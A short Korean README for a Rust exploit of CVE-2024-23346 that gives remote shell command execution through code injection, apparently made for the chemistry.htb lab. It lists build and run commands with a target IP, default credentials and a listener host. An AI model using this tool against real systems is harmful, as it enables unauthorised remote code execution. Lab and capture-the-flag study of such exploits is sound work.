
CVE-2024-23346을 위한 Rust 익스플로잇으로, '터미널' 역할을 합니다 (chemistry.htb에서 테스트됨)
CVE-2024-23346을 위한 Rust 기반 익스플로잇 스크립트.
아래와 같이 POC는 코드 인젝션 취약점을 이용하여 터미널에서처럼 원격 셸 명령을 실행합니다.
익스플로잇 실행 단계:
Cargo로 직접 실행
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19또는
cargo build -r (바이너리는 target/release/poc에 위치)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19익스플로잇 스크립트는 Python 스크립팅 전문가 MAWK0235의 작업에서 영감을 받았습니다.